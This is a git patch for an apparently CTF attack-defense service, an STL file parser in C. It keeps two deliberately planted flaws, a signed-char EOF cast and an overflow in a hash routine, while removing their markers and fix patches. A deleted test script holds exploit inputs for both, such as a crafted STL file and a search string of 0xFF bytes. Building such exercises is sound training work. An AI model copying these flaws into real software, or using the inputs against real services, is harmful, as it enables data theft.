From 13b65f01132c41be9ab8d9f92c2c5ca605c366d8 Mon Sep 17 00:00:00 2001 
From: Louis Burda Date: Sat, 29 May 2021 14:24:31 +0200 Subject: changed repo structure and commited releease files such that default docker-compose worklow commands work in testvm --- service/.dockerignore | 1 - service/.gitignore | 5 +- service/Dockerfile | 22 ++++ service/cleaner.sh | 24 +++++ service/container/.gitignore | 2 - service/container/Dockerfile | 22 ---- service/container/cleaner.sh | 24 ----- service/container/data/lastclean | 0 service/container/docker-compose.yml | 8 -- service/container/entrypoint.sh | 13 --- service/do.sh | 90 ---------------- service/docker-compose.yml | 8 ++ service/entrypoint.sh | 13 +++ service/src/.gitignore | 4 - service/src/Makefile | 1 - service/src/main.c | 27 +++-- service/src/patches/flagstore1.diff | 17 --- service/src/patches/flagstore2.diff | 11 -- service/src/stlfile.c | 9 +- service/src/stlfile.h | 2 +- service/src/util.c | 8 +- service/src/util.h | 2 +- service/tests/data/evil1.stl | 9 -- service/tests/data/flag1.stl | 16 --- service/tests/data/sample-ascii.stl | 16 --- service/tests/data/sample-binary.stl | Bin 134 -> 0 bytes service/tests/test.sh | 200 ----------------------------------- 27 files changed, 88 insertions(+), 466 deletions(-) delete mode 100644 service/.dockerignore create mode 100644 service/Dockerfile create mode 100644 service/cleaner.sh delete mode 100644 service/container/.gitignore delete mode 100644 service/container/Dockerfile delete mode 100644 service/container/cleaner.sh delete mode 100644 service/container/data/lastclean delete mode 100644 service/container/docker-compose.yml delete mode 100755 service/container/entrypoint.sh delete mode 100644 service/do.sh create mode 100644 service/docker-compose.yml create mode 100755 service/entrypoint.sh delete mode 100644 service/src/.gitignore delete mode 100644 service/src/patches/flagstore1.diff delete mode 100644 service/src/patches/flagstore2.diff delete mode 100644 service/tests/data/evil1.stl delete mode 100644 
service/tests/data/flag1.stl
delete mode 100644 service/tests/data/sample-ascii.stl
delete mode 100644 service/tests/data/sample-binary.stl
delete mode 100644 service/tests/test.sh
(limited to 'service')
diff --git a/service/.dockerignore b/service/.dockerignore
deleted file mode 100644
index 4baccb8..0000000
--- a/service/.dockerignore
+++ /dev/null
@@ -1 +0,0 @@
-patches
diff --git a/service/.gitignore b/service/.gitignore
index 5ca3e64..8fce603 100644
--- a/service/.gitignore
+++ b/service/.gitignore
@@ -1,4 +1 @@
-data/*
-!data/.keep
-.cleansrc
-src/.safebuild
+data/
diff --git a/service/Dockerfile b/service/Dockerfile
new file mode 100644
index 0000000..c932e66
--- /dev/null
+++ b/service/Dockerfile
@@ -0,0 +1,22 @@
+FROM ubuntu:18.04
+
+RUN apt update && apt install -y --no-install-recommends socat build-essential
+
+RUN addgroup --system service
+RUN adduser --system --ingroup service --uid 1000 service
+
+COPY entrypoint.sh /
+RUN chmod 755 /entrypoint.sh
+
+COPY cleaner.sh /
+RUN chmod 755 /cleaner.sh
+
+COPY src/ /service/
+
+WORKDIR /service/
+RUN make clean && make
+
+EXPOSE 9000
+ENV RESULTDIR=/data/uploads
+
+ENTRYPOINT ["/entrypoint.sh"]
diff --git a/service/cleaner.sh b/service/cleaner.sh
new file mode 100644
index 0000000..bd67705
--- /dev/null
+++ b/service/cleaner.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+timeref="/data/lastclean"
+
+if [ -z "$RESULTDIR" ]; then
+ echo "RESULTDIR is undefined! skipping cleanup.."
+ exit 1
+fi
+
+if [ -f "$timeref" ]; then
+ files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")"
+ echo "$files" | while read path; do
+ rm -rf "$path"
+ done
+ if [ -z "$files" ]; then
+ filecount=0
+ else
+ filecount=$(echo "$files" | wc -l)
+ fi
+ echo "[ $(date +%T) ] Removed $filecount old files!"
+fi
+
+touch "$timeref"
+
diff --git a/service/container/.gitignore b/service/container/.gitignore
deleted file mode 100644
index 8156e3e..0000000
--- a/service/container/.gitignore
+++ /dev/null
@@ -1,2 +0,0 @@
-src/
-data/
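Review bot: The final image keeps `build-essential` and the whole `src/` tree next to the network-facing binary, and the `apt update && apt install` layer leaves the package lists behind; a two-stage build keeps the compiler out of the image that listens on port 9000. The sketch below compiles in a `build` stage and copies only `/service/build/` (the path entrypoint.sh executes) into the runtime stage. If the binary reads other files from `/service/` at runtime, those need a `COPY --from=build` as well. The sketch also switches to `apt-get` and removes `/var/lib/apt/lists` in the same layer that created it.

```dockerfile
FROM ubuntu:18.04 AS build
RUN apt-get update \
 && apt-get install -y --no-install-recommends build-essential \
 && rm -rf /var/lib/apt/lists/*
COPY src/ /service/
WORKDIR /service/
RUN make clean && make

FROM ubuntu:18.04
RUN apt-get update \
 && apt-get install -y --no-install-recommends socat \
 && rm -rf /var/lib/apt/lists/*
# … unchanged: addgroup/adduser, entrypoint.sh and cleaner.sh COPY + chmod …
COPY --from=build /service/build/ /service/build/
# … unchanged: WORKDIR, EXPOSE, ENV, ENTRYPOINT …
```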
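Review bot: The deletion loop in cleaner.sh splits the `find` output on newlines and reads it with `read` without `-r`, so a name under `$RESULTDIR` that contains a newline, a backslash or leading whitespace makes `rm -rf` act on a different path than the one `find` matched. entrypoint.sh starts this script before it drops to the `service` user, so that `rm -rf` appears to run as root. Letting find hand the paths over directly avoids the re-parsing: `find "$RESULTDIR" -mindepth 1 \! -newer "$timeref" -prune -exec rm -rf -- {} +`. If the count in the log line is still wanted, it can come from a separate `-print | wc -l` pass; whether upload names can contain such characters depends on code outside this hunk.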
diff --git a/service/container/Dockerfile b/service/container/Dockerfile
deleted file mode 100644
index c932e66..0000000
--- a/service/container/Dockerfile
+++ /dev/null
@@ -1,22 +0,0 @@
-FROM ubuntu:18.04
-
-RUN apt update && apt install -y --no-install-recommends socat build-essential
-
-RUN addgroup --system service
-RUN adduser --system --ingroup service --uid 1000 service
-
-COPY entrypoint.sh /
-RUN chmod 755 /entrypoint.sh
-
-COPY cleaner.sh /
-RUN chmod 755 /cleaner.sh
-
-COPY src/ /service/
-
-WORKDIR /service/
-RUN make clean && make
-
-EXPOSE 9000
-ENV RESULTDIR=/data/uploads
-
-ENTRYPOINT ["/entrypoint.sh"]
diff --git a/service/container/cleaner.sh b/service/container/cleaner.sh
deleted file mode 100644
index bd67705..0000000
--- a/service/container/cleaner.sh
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/sh
-
-timeref="/data/lastclean"
-
-if [ -z "$RESULTDIR" ]; then
- echo "RESULTDIR is undefined! skipping cleanup.."
- exit 1
-fi
-
-if [ -f "$timeref" ]; then
- files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")"
- echo "$files" | while read path; do
- rm -rf "$path"
- done
- if [ -z "$files" ]; then
- filecount=0
- else
- filecount=$(echo "$files" | wc -l)
- fi
- echo "[ $(date +%T) ] Removed $filecount old files!"
-fi
-
-touch "$timeref"
-
diff --git a/service/container/data/lastclean b/service/container/data/lastclean
deleted file mode 100644
index e69de29..0000000
diff --git a/service/container/docker-compose.yml b/service/container/docker-compose.yml
deleted file mode 100644
index 1da888f..0000000
--- a/service/container/docker-compose.yml
+++ /dev/null
@@ -1,8 +0,0 @@
-version: '3'
-services:
- printdoc:
- build: .
- volumes:
- - ./data/:/data:rw
- ports:
- - 9090:9000
diff --git a/service/container/entrypoint.sh b/service/container/entrypoint.sh
deleted file mode 100755
index b7b6509..0000000
--- a/service/container/entrypoint.sh
+++ /dev/null
@@ -1,13 +0,0 @@
-#!/bin/sh
-
-mkdir -p "$RESULTDIR"
-chown -R service:service "$RESULTDIR"
-
-while [ 1 ]; do
- /cleaner.sh
- sleep 200
-done &
-
-servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/build/stldoctor",raw,pty,echo=0,stderr'
-
-su -s /bin/sh -c "$servicecmd" service
diff --git a/service/do.sh b/service/do.sh
deleted file mode 100644
index d0ac5ed..0000000
--- a/service/do.sh
+++ /dev/null
@@ -1,90 +0,0 @@ -#!/bin/sh - -SCRIPTPATH="$(dirname $(readlink -f "$0"))" -cd "$SCRIPTPATH" - -makefile=" -all: .cleansrc - -.cleansrc: src/* - bash do.sh cleansrc src container/src - touch .cleansrc -" - -shopt -s expand_aliases -alias pushd="pushd &>/dev/null" -alias popd="popd &>/dev/null" - -if [ "$1" == "compose" ]; then - # ensure container files are up to date - make --file <(echo "$makefile") - - # forward commands to compose - pushd container - docker-compose ${@:2} - popd -elif [ "$1" == "cleansrc" ]; then - if [ $# -lt 3 ]; then - echo "USAGE: do.sh cleansrc " - exit 0 - fi - - # copy files - src="$2" - dst="$3" - [ -e "$dst" ] && rm -rf "$dst" - mkdir -p "$dst" - cp -r "$src"/{*.c,*.h,Makefile,msgs} "$dst" - - # strip comments - find "$dst" | while read path; do - if [ -f "$path" ]; then - if [ ! -z $(echo "$path" | grep '.[hc]$') ]; then - sed -i -e 's/^\s*\/\*.*\*\/\s*$//g' "$path" # remove /* */ style comments - sed -i -e 's/\s*\/\*.*\*\/\s*/ /g' "$path" # remove /* */ style comments - sed -i -e 's/\/\/.*//g' "$path" # remove // style comments - sed -i -e ':a;N;$!ba;s/\n\{3,\}/\n\n/g' "$path" # collapse multiple newlines - sed -i -e 's/fprintf(\s*stderr\s*,\s*/printf(/g' "$path" # replace fprintf stderr - elif [ "$(basename "$path")" == "Makefile" ]; then - sed -i -e 's/\s*#.*//g' "$path" # remove # style comments - sed -i -e ':a;N;$!ba;s/\n\{3,\}/\n\n/g' "$path" # collapse multiple newlines - fi - fi - done -elif [ "$1" == "test" ]; then - SRCDIR="$PWD/src" DATADIR="$PWD/container/data" bash "tests/test.sh" ${@:2} -elif [ "$1" == "make" ]; then - # build a normal version - pushd src - if [ -e ".safebuild" ]; then - make clean - rm ".safebuild" - fi - make - popd -elif [ "$1" == "make-safe" ]; then - # build a 'safe' version with flagstore patches - - pushd src - make clean - touch ".safebuild" - - for f in $(ls | grep '\.[ch]$'); do - cp "$f" "safe_$f" - done - - git apply patches/flagstore1.diff - git apply patches/flagstore2.diff - - 
PREFIX="safe_" make - - rm safe_* - popd -else - echo "USAGE: do.sh (compose) [args..]" - echo "EXAMPLES:" - echo " do.sh compose up --build # starts the docker container" - echo " do.sh cleansrc # post-process source files for release" - echo " do.sh make-safe # create patched version of binary" - echo " do.sh test # run a test on the binary" -fi diff --git a/service/docker-compose.yml b/service/docker-compose.yml new file mode 100644 index 0000000..1da888f --- /dev/null +++ b/service/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + printdoc: + build: . + volumes: + - ./data/:/data:rw + ports: + - 9090:9000 diff --git a/service/entrypoint.sh b/service/entrypoint.sh new file mode 100755 index 0000000..b7b6509 --- /dev/null +++ b/service/entrypoint.sh @@ -0,0 +1,13 @@ +#!/bin/sh + +mkdir -p "$RESULTDIR" +chown -R service:service "$RESULTDIR" + +while [ 1 ]; do + /cleaner.sh + sleep 200 +done & + +servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/build/stldoctor",raw,pty,echo=0,stderr' + +su -s /bin/sh -c "$servicecmd" service diff --git a/service/src/.gitignore b/service/src/.gitignore deleted file mode 100644 index 5f14e4d..0000000 --- a/service/src/.gitignore +++ /dev/null @@ -1,4 +0,0 @@ -stldoctor -*.o -vgcore.* -safe_* diff --git a/service/src/Makefile b/service/src/Makefile index d7732b3..2fee8c4 100644 --- a/service/src/Makefile +++ b/service/src/Makefile @@ -1,6 +1,5 @@ CFLAGS = -g -I . -# fortify source code CFLAGS += -fPIE -fstack-protector-strong -D_FORTIFY_SOURCE=2 -O2 LDFLAGS = -Wl,-z,now -Wl,-z,relro diff --git a/service/src/main.c b/service/src/main.c index de2bd48..d76ceb8 100644 --- a/service/src/main.c +++ b/service/src/main.c 
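Review bot: The last line of entrypoint.sh runs `su -s /bin/sh -c "$servicecmd" service` as a child process, so the entrypoint shell remains PID 1 and, having no TERM handler, is likely to ignore `docker stop` until the kill timeout expires. `exec su -s /bin/sh -c "$servicecmd" service` replaces the shell with the service process tree instead. The loop header `while [ 1 ]` also works only because `[ 1 ]` tests a non-empty string; `while :; do` states the intent.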
@@ -144,21 +144,21 @@ upload_cmd(const char *arg) bufp = ask("How large is your file? "); len = strtoul(bufp, &end, 10); if (len <= 0 || len >= MAXFILESIZE || *end) { - fprintf(stderr, "Invalid file length!\n"); + printf("Invalid file length!\n"); return; } printf("Ok! Im listening..\n"); contents = checkp(malloc(len + 1)); if (fread(contents, 1, len, stdin) != len) { - fprintf(stderr, "Hm, I'm missing some bytes.. try again!\n"); + printf("Hm, I'm missing some bytes.. try again!\n"); goto cleanup; } contents[len] = '\0'; if ((cached.valid = parse_file(&cached, contents, len))) { if (save_submission(&cached, contents, len) != OK) - fprintf(stderr, "Failed to save your submission!\n"); + printf("Failed to save your submission!\n"); else printf("Your file was saved with ID %s!\n", cached.hash); } @@ -180,7 +180,7 @@ search_cmd(const char *arg) if (arg && !strcmp(arg, "last")) { if (!cached.valid) { - fprintf(stderr, "No cached info report available\n"); + printf("No cached info report available\n"); return; } hash = cached.hash; @@ -201,12 +201,12 @@ search_cmd(const char *arg) } if (i == 0) { - fprintf(stderr, "Sorry, couldnt find a matching scan result!\n"); + printf("Sorry, couldnt find a matching scan result!\n"); goto cleanup; } else { which = strtoul(ask("Which of these results? "), &end, 10); if (which >= i || which < 0 || *end) { - fprintf(stderr, "Invalid index!\n"); + printf("Invalid index!\n"); goto cleanup; } } @@ -224,9 +224,8 @@ search_cmd(const char *arg) } } - /* file got cleaned up during race condition by background task */ if (!scandir) { - fprintf(stderr, "Selected result spontaneously combusted!\n"); + printf("Selected result spontaneously combusted!\n"); goto cleanup; } @@ -271,7 +270,7 @@ list_cmd(const char *arg) DIR *d; if (!loggedin) { - fprintf(stderr, "Not logged in!\n"); + printf("Not logged in!\n"); return; } 
@@ -283,7 +282,7 @@ list_cmd(const char *arg) path = aprintf("%s/%s/info", resultdir, de->d_name); if ((f = fopen(path, "r"))) { if (load_info(&info, f) != OK) - fprintf(stderr, "Failed to read saved file info!\n"); + printf("Failed to read saved file info!\n"); else print_info(&info); fclose(f); @@ -301,7 +300,7 @@ auth_cmd(const char *arg) int ret; if (loggedin) { - fprintf(stderr, "Already logged in!\n"); + printf("Already logged in!\n"); return; } @@ -313,7 +312,7 @@ auth_cmd(const char *arg) } else if (ret && errno == EEXIST) { printf("Success!\nWelcome back!\n"); } else { - fprintf(stderr, "Auth failed!\n"); + printf("Auth failed!\n"); return; } @@ -339,7 +338,7 @@ main() int exit, i, cmdlen; if (!(resultdir = checkp(strdup(getenv("RESULTDIR"))))) { - fprintf(stderr, "RESULTDIR not defined\n"); + printf("RESULTDIR not defined\n"); return 1; } @@ -371,6 +370,6 @@ main() } if (i == ARRSIZE(commands) && strlen(cmd) != 0) - fprintf(stderr, "No such command!\n"); + printf("No such command!\n"); } } diff --git a/service/src/patches/flagstore1.diff b/service/src/patches/flagstore1.diff deleted file mode 100644 index f0f8d4a..0000000 --- a/service/src/patches/flagstore1.diff +++ /dev/null @@ -1,17 +0,0 @@ ---- a/service/src/safe_util.c -+++ b/service/src/safe_util.c -@@ -78,13 +78,12 @@ void - freadstr(FILE *f, char **dst) - { - size_t start, len, tmp; -- char c; - - /* VULN #1: BAD CAST */ - /* see documentation/README.md for more details */ - - start = ftell(f); -- for (len = 0; (c = fgetc(f)) != EOF && c; len++); -+ for (len = 0; fgetc(f) > 0; len++); - fseek(f, start, SEEK_SET); - - *dst = checkp(calloc(1, len + 1)); diff --git a/service/src/patches/flagstore2.diff b/service/src/patches/flagstore2.diff deleted file mode 100644 index b34a0c0..0000000 --- a/service/src/patches/flagstore2.diff +++ /dev/null 
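Review bot: In the `main()` hunk (`@@ -339,7 +338,7 @@`), `strdup(getenv("RESULTDIR"))` passes NULL to `strdup` when the variable is unset, which is undefined behaviour and in practice a crash, so the `RESULTDIR not defined` message this commit reroutes to stdout cannot be printed in that case. Read the variable first: `const char *env = getenv("RESULTDIR");` then `if (!env) { printf("RESULTDIR not defined\n"); return 1; }` and only afterwards `resultdir = checkp(strdup(env));`. main()'s body starts and ends outside the hunk.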
@@ -1,11 +0,0 @@ ---- a/service/src/safe_util.c -+++ b/service/src/safe_util.c -@@ -58,7 +58,7 @@ mhash(const char *str, int len) - srand(v); - - for (bp = buf, i = 0; i < MHASHLEN / 2; i++) -- bp += sprintf(bp, "%02x", str[i % len] ^ (rand() % 256)); -+ bp += sprintf(bp, "%02x", (unsigned char) str[i % len] ^ (rand() % 256)); - - return buf; - } diff --git a/service/src/stlfile.c b/service/src/stlfile.c index 88fc430..7b37df4 100644 --- a/service/src/stlfile.c +++ b/service/src/stlfile.c @@ -98,7 +98,7 @@ consume_keyword(char **start) for (i = 0; i < ARRSIZE(kwmap); i++) { len = strlen(kwmap[i].str); if (!strncmp(kwmap[i].str, bp, len) && (!bp[len] || isws(bp[len]))) { - // printf("GOT: %s\n", kwmap[i].str); + *start = bp + len + (bp[len] ? 1 : 0); return kwmap[i].code; } @@ -108,7 +108,7 @@ consume_keyword(char **start) } #define PARSE_FAIL(...) \ - do { fprintf(stderr, "FORMAT ERR: " __VA_ARGS__); goto fail; } while (0) + do { printf("FORMAT ERR: " __VA_ARGS__); goto fail; } while (0) int parse_file_ascii(struct parseinfo *info, char *buf, size_t len) @@ -272,13 +272,12 @@ parse_file(struct parseinfo *info, char *buf, size_t len) if (info->valid) free_info(info); if (len < 7) { - fprintf(stderr, "File too small!\n"); + printf("File too small!\n"); return FAIL; } info->filesize = len; - /* check bin vs ascii with first keyword */ for (bp = buf; isws(*bp); bp++); status = !strncmp("solid", bp, 5) && isws(bp[5]) ? parse_file_ascii(info, buf, len) @@ -290,7 +289,7 @@ parse_file(struct parseinfo *info, char *buf, size_t len) if (!info->modelname) { resp = ask("Please enter your model name: "); if (strlen(resp) < 4) { - fprintf(stderr, "Model name is too short!\n"); + printf("Model name is too short!\n"); return FAIL; } info->modelname = checkp(strdup(resp)); diff --git a/service/src/stlfile.h b/service/src/stlfile.h index d321282..11b7f66 100644 --- a/service/src/stlfile.h +++ b/service/src/stlfile.h 
@@ -51,4 +51,4 @@ int load_info(struct parseinfo *info, FILE *f); void print_info(struct parseinfo *info); void free_info(struct parseinfo *info); -#endif /* STLFILE_H */ +#endif diff --git a/service/src/util.c b/service/src/util.c index ce22c4e..140d08b 100644 --- a/service/src/util.c +++ b/service/src/util.c @@ -13,7 +13,7 @@ die(const char *fmtstr, ...) va_list ap; va_start(ap, fmtstr); - vfprintf(stderr, fmtstr, ap); + vprintf(fmtstr, ap); va_end(ap); exit(EXIT_FAILURE); @@ -49,9 +49,6 @@ mhash(const char *str, int len) int i, k, v; char c, *bp; - /* VULN #2: BUFFER OVERFLOW */ - /* see documentation/README.md for more details */ - if (len == -1) len = strlen(str); for (v = 0, i = 0; i < len; i++) v += str[i]; @@ -80,9 +77,6 @@ freadstr(FILE *f, char **dst) size_t start, len, tmp; char c; - /* VULN #1: BAD CAST */ - /* see documentation/README.md for more details */ - start = ftell(f); for (len = 0; (c = fgetc(f)) != EOF && c; len++); fseek(f, start, SEEK_SET); diff --git a/service/src/util.h b/service/src/util.h index c0e9064..7b6eed0 100644 --- a/service/src/util.h +++ b/service/src/util.h @@ -35,4 +35,4 @@ float fle32toh(float v); extern int echo; -#endif /* UTIL_H */ +#endif diff --git a/service/tests/data/evil1.stl b/service/tests/data/evil1.stl deleted file mode 100644 index 706e9e2..0000000 --- a/service/tests/data/evil1.stl +++ /dev/null @@ -1,9 +0,0 @@ -solid test˙ -facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/tests/data/flag1.stl b/service/tests/data/flag1.stl deleted file mode 100644 index f2a3854..0000000 --- a/service/tests/data/flag1.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid ENO{TESTFLAG} - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid 
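Review bot: In the `freadstr` hunk of util.c, `c` is a `char` that receives the `int` returned by `fgetc()`, so where `char` is signed a 0xFF byte in the file compares equal to `EOF` and the length scan stops early. This commit removes the comment that marked the problem and deletes patches/flagstore1.diff, which carried the fix. If this build is meant to be hardened, keep that fix in the loop, `for (len = 0; fgetc(f) > 0; len++);`, and drop the `char c;` declaration. The `mhash` hunk removes the marker for the second issue in the same way; its fix in the deleted patches/flagstore2.diff was the `(unsigned char)` cast on `str[i % len]`. Both function bodies continue outside their hunks.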
diff --git a/service/tests/data/sample-ascii.stl b/service/tests/data/sample-ascii.stl deleted file mode 100644 index e3c89ef..0000000 --- a/service/tests/data/sample-ascii.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid test - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid test diff --git a/service/tests/data/sample-binary.stl b/service/tests/data/sample-binary.stl deleted file mode 100644 index 13c02e4..0000000 Binary files a/service/tests/data/sample-binary.stl and /dev/null differ diff --git a/service/tests/test.sh b/service/tests/test.sh deleted file mode 100644 index 4835024..0000000 --- a/service/tests/test.sh +++ /dev/null 
@@ -1,200 +0,0 @@ -#!/bin/sh - -set -e - -if [ -z "$SRCDIR" -o -z "$DATADIR" ]; then - echo "Missing either SRCDIR or DATADIR env vars" - exit 1 -fi - -export RESULTDIR="$DATADIR/uploads" -export ECHO_INPUT=1 - -SCRIPTPATH="$(dirname $(readlink -f "$0"))" -TESTDATA="$SCRIPTPATH/data" - -shopt -s expand_aliases -alias pushd="pushd &>/dev/null" -alias popd="popd &>/dev/null" - -pushd "$SRCDIR" - -announce() { - count=$(echo "$1" | wc -c) - python3 -c " -import math -s = '$1' -c = 80 -print() -print('#'*c) -print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#') -print('#'*c) -print() - " -} - -checkleaks() { - valgrind --leak-check=full --show-leak-kinds=all ./build/stldoctor 2>&1 | tee /tmp/testlog - if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then - echo "Valgrind exited with errors!" - exit 1 - fi -} - -connect() { - if [ "$RUNTYPE" == "remote" ]; then - nc localhost 9090 - elif [ "$RUNTYPE" == "debug" ]; then - checkleaks - else - ./build/stldoctor - fi -} - -cleanuploads() { - [ ! -z "$RESULTDIR" ] && rm -rf "$RESULTDIR" - mkdir -p "$RESULTDIR" -} - -if [ "$1" == "stl-leaks" ]; then - cleanuploads - - announce "Testing ASCII STL Parsing" - ( - echo "echo" - echo "upload" - cat "$TESTDATA/sample-ascii.stl" | wc -c - cat "$TESTDATA/sample-ascii.stl" - echo "ASCII-testname" - ) | checkleaks - - announce "Testing BIN STL Parsing" - ( - echo "echo" - echo "upload" - cat "$TESTDATA/sample-binary.stl" | wc -c - cat "$TESTDATA/sample-binary.stl" - echo "BIN-testname" - ) | checkleaks - -elif [ "$1" == "stl-upload" ]; then - cleanuploads - - popd - file="$(realpath $2)" - if [ ! 
-e "$file" ]; then - echo "Supply a file to upload" - exit 1 - fi - pushd "$SRCDIR" - - name="${3:-samplefile}" - ( - echo "echo" - echo "upload" - cat "$file" | wc -c - cat "$file" - echo "$name" - ) | checkleaks - -elif [ "$1" == "vuln1" ]; then - cleanuploads - - announce "Testing Flagstore 1" - - echo -e "\n--- Uploading target STL ---\n" 1>&2 - ( - echo "echo" - echo "upload" - cat "$TESTDATA/flag1.stl" | wc -c - cat "$TESTDATA/flag1.stl" - echo "N0TaFL4G" - echo "exit" - ) | connect - - echo -e "\n--- Uploading evil STL ---\n" 1>&2 - ( - echo "echo" - echo "upload" - cat "$TESTDATA/evil1.stl" | wc -c - cat "$TESTDATA/evil1.stl" - echo "EV1L" - echo "exit" - ) | connect - - echo -e "\n--- Testing Exploit ---\n" 1>&2 - ( - echo "echo" - - # try index 0 - echo "search" - echo "EV1L" - echo "0" - echo "n" - - echo "search last" - echo "0" - echo "n" - - # try index 1 - echo "search" - echo -e "EV1L" - echo "0" - echo "n" - - echo "search last" - echo "1" - echo "n" - echo "exit" - ) | connect - -elif [ "$1" == "vuln2" ]; then - cleanuploads - - announce "Testing Flagstore 2" - - echo -e "\n--- Uploading target STL ---\n" 1>&2 - ( - echo "echo" - echo "auth test" - echo "upload" - cat "$TESTDATA/flag1.stl" | wc -c - cat "$TESTDATA/flag1.stl" - echo "N0TaFL4G" - echo "exit" - ) | connect - - echo -e "\n--- Testing Exploit ---\n" 1>&2 - ( - echo "echo" - echo -e "search \xff\xff\xff\xff\xff0000000000000000" - echo "auth" - echo "list" - echo "exit" - ) | connect - -elif [ "$1" == "auth-upload" ]; then - cleanuploads - - ( - echo "echo" - - echo "auth test" - echo "upload" - cat "$TESTDATA/sample-ascii.stl" | wc -c - cat "$TESTDATA/sample-ascii.stl" - echo "testname" - ) | connect - - ( - echo "echo" - - echo "auth test" - echo "list" - echo "search testname" - ) | connect -else - connect -fi - -popd -- cgit v1.2.3-71-gd317